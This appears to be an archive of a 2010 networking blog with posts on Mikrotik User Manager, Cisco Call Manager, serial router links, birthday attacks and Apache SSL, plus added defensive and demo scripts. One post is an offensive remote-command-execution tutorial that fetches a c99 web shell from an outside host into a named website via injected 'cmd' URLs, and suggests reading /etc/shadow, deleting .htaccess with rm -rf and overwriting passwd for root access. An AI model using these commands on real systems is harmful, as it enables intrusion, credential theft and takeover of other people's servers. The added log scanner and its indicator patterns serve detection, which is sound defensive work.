Thursday, August 19, 2010

Config User Manager On Mikrotik


In This Post, We Want To Set Up User Manager On Mikrotik.
User Manager Is An Accounting Program That Uses RADIUS.
You Can Download The User Manager Package From The Mikrotik Website.
Let's See How To Config User Manager On Mikrotik:
At First, Let's Enable RADIUS For PPP On Mikrotik:

/ ppp aaa set use-radius=yes

And Set The Local Address In The Default PPP Profile:

/ ppp profile set default local-address=192.168.0.1

Here, 192.168.0.1 Is The Local IP Address That Is Used, For Example, By The PPPoE Server Or A VPN Interface.
Now, Let's Add A RADIUS Client So That The PPP Service Consults User Manager:

/ radius add service=ppp address=10.0.0.1 secret=123456789

10.0.0.1 Is The Accounting Server IP Address, And 123456789 Is The Shared Secret.
 
Now, Let's Add Owner To User Manager:
 
/ tool user-manager customer add login="uman-admin" password="1234" permissions=owner
 
uman-admin Is The Login Name And 1234 Is The Password.
Now It's Time To Add The PPP Server Information To The Router List:
 
/ tool user-manager router add customer=uman-admin ip-address=10.0.0.1 shared-secret=123456789
 
uman-admin Is The Login Name, 10.0.0.1 Is The Accounting Server IP Address And 123456789 Is The Secret; It Must Be The Same Secret Used In The radius Command Above, Otherwise User Manager Will Reject The Requests.
It's Done. You Can Access User Manager At:
 
http://serveripaddress/userman

Sunday, August 15, 2010

Setup Call Manager On Cisco Router


Some Cisco Routers Are Able To Work As A Call Manager, Like The 2600, 2800, 3600, 3700 And 7200 Series.


It's Important That The IOS On The Router Supports Call Manager.
Let's See How To Config Call Manager On The Router.


At First, Go To The Configuration Mode:

 >enable
 #config terminal
 (config)#telephony-service

Now, It's Time To Set The Maximum Number Of Phones (max-ephones) And Directory Numbers (max-dn) That Are Able To Communicate With Each Other:

 (config-telephony)#max-ephones 2
 (config-telephony)#max-dn 2

In My Example, We Have Two Phones.
Now, We Should Set The IP Source Address And The Port That The Phones Register To:

 (config-telephony)#ip source-address 192.168.0.20 port 2000
 (config-telephony)#exit

Our Source Address Is 192.168.0.20 And The Port Is 2000.
Now, Let's Set The Directory Number Of Each ephone:

 (config)#ephone-dn 1
 (config-ephone-dn)#number 1234
 (config-ephone-dn)#exit

 (config)#ephone-dn 2
 (config-ephone-dn)#number 5678
 (config-ephone-dn)#exit

 Now, We Should Set The MAC Address And Type Of Each Phone, And Bind Its First Button To Its Directory Number:

 (config)#ephone 1
 (config-ephone)#mac-address 00aa.aaaa.aaaa
 (config-ephone)#type 7902
 (config-ephone)#button 1:1
 (config-ephone)#exit

 (config)#ephone 2
 (config-ephone)#mac-address 00bb.bbbb.bbbb
 (config-ephone)#type 7902
 (config-ephone)#button 1:2
 (config-ephone)#exit 

Let's Check The Registered Phones:

 #show ephone

Well Done, Your Phones Are Ready.

Thursday, August 12, 2010

Remote Command Execution (RCE) Vulnerability ::: Exploiting In Linux


Remote Command Execution Is A Kind Of Vulnerability In Which You Are Able To Run Commands On The Victim Server.
This Is Usually A High Risk Vulnerability, And There Are Lots Of Methods For Using It To Gain Access To The Victim Server.
Whenever The Value Of A Variable Like "cmd" Is Passed To A Function That Runs Commands, Such As system() Or passthru() In PHP, And You Are Able To Inject Your Command Into That Variable, Then RCE Happens.
There Are Lots Of Methods For Using This Vulnerability; Let's Talk About The Major Ways:

1-Download The Shell Script Code To The Victim Server, Using Download Commands:
In Linux, There Are A Series Of Commands That Enable You To Download A Given File Onto The Server.
Let's See An Example:
We Have RCE In This Website.


Now, We Are Able To Inject The "cmd" Variable.
Well, We Want To Download The File Onto The Server, So Use One Of These Commands:

lwp-download http://[shell]

wget http://shell -O shell.php

fetch -o shell.php -p http://shell

lynx -source http://shell > shell.php

links -source http://shell > shell.php

GET http://shell > shell.php

 

In My Example, wget Didn't Work, So I Tried lwp-download And Downloaded The C99 Shell Script To The Server, Then Renamed It From c99.txt To c99.php.

http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php

Well Done, Now We Have The C99 Shell Script At http://angelptc.info/c99.php .


2-Reading Files:

 2-1: Reading The Shadow File: Shadow Is The Most Important File In Linux. Sometimes The Shadow File Has Read Permission, And Then You Are Able To Read It With: cat /etc/shadow
After That, You Can Crack It And Get Root Access.

 2-2: Reading Configuration Files:
 Sometimes, In Some Websites And Content Management Systems, There Is Good Information In The Configuration File. For Example, In Joomla/Mambo CMS There Is A Section Containing The FTP Username And Password, Or Sometimes The Website Owner Puts The Password Of The Hosting Control Panel In The Configuration File As The Database Password.
And In Some Web Applications, The Administrator Username And Password Are Stored In Files; You Can Read Them And Find The Administrator Username And Password.
You Can Read A Configuration File With The cat Command.

 2-3: Reading Other Hosts' Web Application Configuration Files:
 You Can Also Read Other Hosts' Web Application Configuration Files, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And So On.

3: Removing Files: In Some Web Applications, The Administrator Folder Is Password Protected; You Can Remove The File That Causes This Protection And Use The Administrator Folder.
For Example, In The Apache Web Server, The .htaccess File Causes The Folder Protection; You Can Delete The File With The rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected; Again, You Can Remove This Protection With The rm -rf Command.


4.Updating Files:
In RCE, Editing A File Is So Hard, Because Linux Editors Like vi Or nano Have Special Commands For Saving And Editing, So You Should Update The Files Instead.
Updating Files Is Useful; For Example, If The passwd File Has The Permission, You Are Able To Read It, Delete It And Then Download A New passwd That You Edited Yourself And That Gives You Root Access.
Also, You Are Able To Update Configuration Files And The Files That Store Usernames And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read The File And Save It To Your Computer (cat command)
-Remove The File (rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It (download commands such as wget, GET and so on)
 
5-Rename Uploaded File:
Sometimes, You Can Upload Images Or Texts To A Website, But You Can't Upload A PHP File; If There Is An RCE Vulnerability, You Can Change The Name Of That File.
At First, Rename Your Shell Script To .jpg, .gif, .txt Or Similar.
Then, Use The mv Command To Change The File Name:
 
mv file.txt file.php

Or Anything Else Like This.
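The Injection Pattern Described Above Leaves A Clear Trace In The Web Server Access Log. As An Added Example That Is Not Part Of The Original Post, This Python Script Scans Constructed Log Lines For Requests Whose Query Parameters Carry The Download Commands, File Reads And Renames Listed In This Post; The Log Lines, IP Addresses And Host Names Are Made Up For The Example.

```python
"""Scan access-log lines for the "cmd" parameter abuse this post describes."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Indicators taken from the techniques in this post: download tools, reading
# /etc/shadow or /etc/passwd, rm -rf on protection files, renaming to .php,
# and shell metacharacters used to chain or redirect commands.
INDICATORS = [
    re.compile(r'\b(wget|lwp-download|fetch|lynx|links|curl)\b'),
    re.compile(r'/etc/(shadow|passwd)'),
    re.compile(r'\brm\s+-rf?\b'),
    re.compile(r'\b(mv|cp)\b.*\.php\b'),
    re.compile(r'[;|`$>]'),
]

def suspicious_params(target):
    """Return (param, value, pattern) for each query parameter matching an indicator."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        for pat in INDICATORS:
            if pat.search(value):
                hits.append((name, value, pat.pattern))
                break
    return hits

def scan_log(lines):
    """Return (ip, param, value, pattern) for every request carrying an indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for name, value, pat in suspicious_params(m['target']):
                alerts.append((m['ip'], name, value, pat))
    return alerts

# Constructed sample log (not real traffic): benign browse, three injection attempts, benign search.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Aug/2010:10:01:02 +0000] "GET /index.php?view=help&faq=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Aug/2010:10:01:09 +0000] "GET /index.php?view=help&faq=1&cmd=lwp-download%20http://example.invalid/c99.txt HTTP/1.1" 200 88',
    '198.51.100.7 - - [12/Aug/2010:10:01:15 +0000] "GET /index.php?view=help&faq=1&cmd=cp%20c99.txt%20c99.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [12/Aug/2010:10:02:00 +0000] "GET /index.php?view=help&cmd=cat%20/etc/shadow HTTP/1.1" 200 1900',
    '203.0.113.9 - - [12/Aug/2010:10:02:30 +0000] "GET /search.php?q=catalogue HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for ip, param, value, pat in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip} param={param!r} value={value!r} matched={pat}")
```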

Wednesday, August 11, 2010

Birthday Attack

Imagine That You Have A Hash Function Named f. Now, f(value): If You Enter "a" As The Value, For Example, It Returns "k". So Far There Is No Problem, But The Problem Arises When Another Value Gives The Same Result; For Example, If You Enter The Value "z" And The Function Again Returns "k", That Is A Collision.

A Birthday Attack Is A Type Of Cryptographic Attack Based On The Birthday Paradox, A Mathematical Subject. A Birthday Attack Looks Like A Kind Of Brute Force Attack, In Which The Attacker Tries To Find Two Different Inputs That Have The Same Output.
The Attacker May Then Be Able To Bypass Or Subvert Authentication.

One Of The Most Famous Birthday Attack Vulnerabilities Is In The TACACS+ Authentication Method.
In This Method, We Can See Two Different Sessions With The Same Session ID.
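The Post Describes The Attack In Words; As An Added Example That Is Not Part Of The Original Post, This Python Script Runs The Search With f Defined As SHA-256 Truncated To n Bits And Compares The Number Of Inputs Needed Against The Birthday Bound sqrt(pi/2 * 2^n) And Against The 2^n Work Of A Plain Brute-Force Preimage Search. The Function And Input Names Are Constructed For The Example.

```python
"""Birthday search on a truncated hash: collisions cost about sqrt(2**n), not 2**n."""
import hashlib
import math

def f(value: bytes, nbits: int) -> int:
    """The post's hash function f, here SHA-256 truncated to its low nbits bits
    so that the output space has exactly 2**nbits values."""
    digest = int.from_bytes(hashlib.sha256(value).digest(), "big")
    return digest & ((1 << nbits) - 1)

def find_collision(nbits: int):
    """Birthday search: remember every output seen and stop at the first repeat.
    Inputs are the constructed strings msg-0, msg-1, ... so the run is repeatable.
    Returns (trials, first_input, second_input) with f(first) == f(second)."""
    seen = {}
    i = 0
    while True:
        msg = b"msg-%d" % i
        h = f(msg, nbits)
        if h in seen:
            return i + 1, seen[h], msg
        seen[h] = msg
        i += 1

def expected_birthday_trials(nbits: int) -> float:
    """Expected number of inputs until the first collision: about sqrt(pi/2 * 2**n)."""
    return math.sqrt(math.pi / 2 * 2 ** nbits)

def collision_probability(trials: int, nbits: int) -> float:
    """Probability of at least one collision among `trials` outputs: 1 - exp(-k^2 / 2N)."""
    return 1 - math.exp(-(trials ** 2) / (2 * 2 ** nbits))

if __name__ == "__main__":
    n = 24
    trials, a, b = find_collision(n)
    print(f"{n}-bit output: collision after {trials} inputs "
          f"(birthday bound ~{expected_birthday_trials(n):.0f}, preimage brute force ~{2 ** n})")
    print(f"f({a!r}) == f({b!r}) == {f(a, n):#x}")
```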

Tuesday, August 10, 2010

Cisco Router Back To Back Connection


One Of The Most Useful Connections Between Routers Is The Back To Back Connection, In Which Routers Can Communicate With Each Other And Route Packets From One Router To Another.

For A Back To Back Connection In Cisco Routers, We Use The Serial Interface And A Back To Back Serial Cable.

Here, We Want To Connect Routers R1 And R2 With A Back To Back Connection.
Well, After The Cable Connection, It's Time To Configure The Back To Back Connection In The Routers.
When You Connect Two Routers To Each Other With A Back To Back Connection On A Serial Interface, One Of Them Is DCE And The Other Is DTE.
You Should Set The Clock Rate On The DCE, But The DTE Automatically Detects The Clock Rate.
In This Example, R1 Is DTE, Connected Through Its Serial 0 Interface To R2, And R2 Is DCE, Connected Through Its Serial 1 Interface To R1.
Now, Let's Config The Routers.

Router R1:
At First, If You Don't Know Whether The Interface Is DCE Or DTE, Enter This Command (The Cable Type Is Shown In The Controller Output):

 show controllers serial 0

Now, You Can Find Out Whether It Is DCE Or DTE.
After That, You Should Enable The Serial 0 Interface And Assign An IP Address To It. Be Careful: The Serial 0 Interface On R1 And The Serial 1 Interface On R2 Should Have IP Addresses In The Same Range With The Same Subnet Mask.

 >enable
 #config terminal
 (config)#interface serial 0
 (config-if)#ip address 10.0.0.1 255.255.255.0
 (config-if)#no shutdown

Now, Router R1 Is Ready.

Router R2:
The Configuration Of R2 Is The Same As R1, But This One Is DCE And You Should Set The Clock Rate.

 >enable
 #config terminal
 (config)#interface serial 1
 (config-if)#ip address 10.0.0.2 255.255.255.0
 (config-if)#no shutdown
 (config-if)#clock rate 5600

Now It Is Ready. Let's Test Our Connection With Ping:
R1 Router:

 #ping 10.0.0.2 

R2 Router:

 #ping 10.0.0.1


Create Self-Signed Certificate And Configure Apache To Run SSL



Whenever You Want To Enable The SSL Protocol, You Will Need A Certificate. At The End Of This Post, You Will Be Able To Create A Self-Signed Certificate And Enable SSL, In Order To Use HTTPS.
By Default, SSL Is Disabled And You Should Enable It Manually.
The SSL Protocol Works On Port 443 And You Can Use It By Writing HTTPS Instead Of HTTP At The Beginning Of The URL.
By Default, HTTP Uses Port 80 And HTTPS Uses Port 443, But You Can Change That In Your Web Server Configuration File.
Let's See What We Should Do In Order To Enable SSL On A Linux Server That Runs Apache As Its Web Server.

At First, We Should Generate a Private Key, Use The Following Command For This Purpose:

 openssl genrsa -des3 -out certificate.key 1024

This Is A 1024-bit RSA Key, Encrypted Using Triple-DES And Stored In PEM Format.
You Should Enter A PEM Pass Phrase.
After That, It Is Time To Generate A CSR:

 openssl req -new -key certificate.key -out certificate.csr 


When You Press Enter, It Asks Several Questions; Answer Them Correctly.
Now, We Will Remove The Pass-Phrase From The Key. Apache Asks For The Pass-Phrase Each Time It Starts, Which Means That Whenever The Server Crashes Or Reboots, You Should Enter The Password In Order To Enable SSL. It Is Possible To Remove The Triple-DES Encryption From The Key; After That, There Is No Need To Enter A Password When The Apache Server Starts, But The Key File Is Then Stored In Clear, So Restrict Its Permissions To root.

 openssl rsa -in certificate.key -out certificatenew.key 
  
Now, We Will Generate a Self-Signed Certificate

 openssl x509 -req -days 365 -in certificate.csr -signkey certificatenew.key -out certificate.crt 

Now, We Have A Self-Signed Certificate That Is Valid For 1 Year. You Can Change It By Changing The Number 365; For Example, If You Change It To 3650, It Is Valid For 10 Years.

If You Want To Install This Certificate On Apache, At First You Should Install "mod_ssl"; After That, Copy The Certificate And Key To The Paths Used In The Virtual Host Below:

 cp certificate.crt /usr/local/apache/conf/ssl.crt/server.crt
 cp certificatenew.key /usr/local/apache/conf/ssl.key/server.key

Now, We Should Configure The SSL-Enabled Virtual Host:

SSLEngine on
SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
CustomLog logs/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 

Well Done, Restart Apache:

/etc/init.d/httpd restart

It Should Work Right Now. Try: https://example.com
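As An Added Example That Is Not Part Of The Original Post, This Shell Script Runs The Same OpenSSL Steps Non-Interactively And Adds The Check Apache Effectively Does At Start-Up: That The Certificate And The Key Belong Together. It Assumes The openssl CLI Is Installed; Paths, Common Name And Validity Are Constructed Values.

```shell
#!/bin/sh
# Key -> CSR -> self-signed certificate, as in the post, plus the key/cert
# consistency check. Directory, CN and validity are constructed inputs.
set -eu

# gen_selfsigned DIR DAYS CN
# Uses -subj so no questions are asked, and creates the key without a pass
# phrase (the post reaches the same state by stripping it with "openssl rsa").
gen_selfsigned() {
    dir=$1; days=$2; cn=$3
    mkdir -p "$dir"
    # The post uses 1024 bits; 2048 is the smallest size modern clients accept.
    openssl genrsa -out "$dir/server.key" 2048 2>/dev/null
    # An unencrypted key must not be readable by other users.
    chmod 600 "$dir/server.key"
    openssl req -new -key "$dir/server.key" -out "$dir/server.csr" \
        -subj "/CN=$cn" 2>/dev/null
    openssl x509 -req -days "$days" -in "$dir/server.csr" \
        -signkey "$dir/server.key" -out "$dir/server.crt" 2>/dev/null
}

# key_matches_cert CRT KEY -> prints "match" or "mismatch"
# Compares the RSA modulus in both files; a mismatch is what makes Apache
# refuse to start with the SSLCertificateFile/SSLCertificateKeyFile pair.
key_matches_cert() {
    c=$(openssl x509 -noout -modulus -in "$1" | openssl sha256)
    k=$(openssl rsa -noout -modulus -in "$2" 2>/dev/null | openssl sha256)
    if [ "$c" = "$k" ]; then echo match; else echo mismatch; fi
}

# cert_is_self_signed CRT -> prints "yes" or "no" (issuer equals subject)
cert_is_self_signed() {
    s=$(openssl x509 -noout -subject -in "$1" | sed 's/^subject=//')
    i=$(openssl x509 -noout -issuer -in "$1" | sed 's/^issuer=//')
    if [ "$s" = "$i" ]; then echo yes; else echo no; fi
}

# Stand-alone run: build a pair in a temporary directory and report on it.
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    gen_selfsigned "$d" 365 example.com
    echo "self-signed: $(cert_is_self_signed "$d/server.crt")"
    echo "key/cert: $(key_matches_cert "$d/server.crt" "$d/server.key")"
fi
```

Run It With The Argument demo To Build A Pair In A Temporary Directory And Print Both Checks.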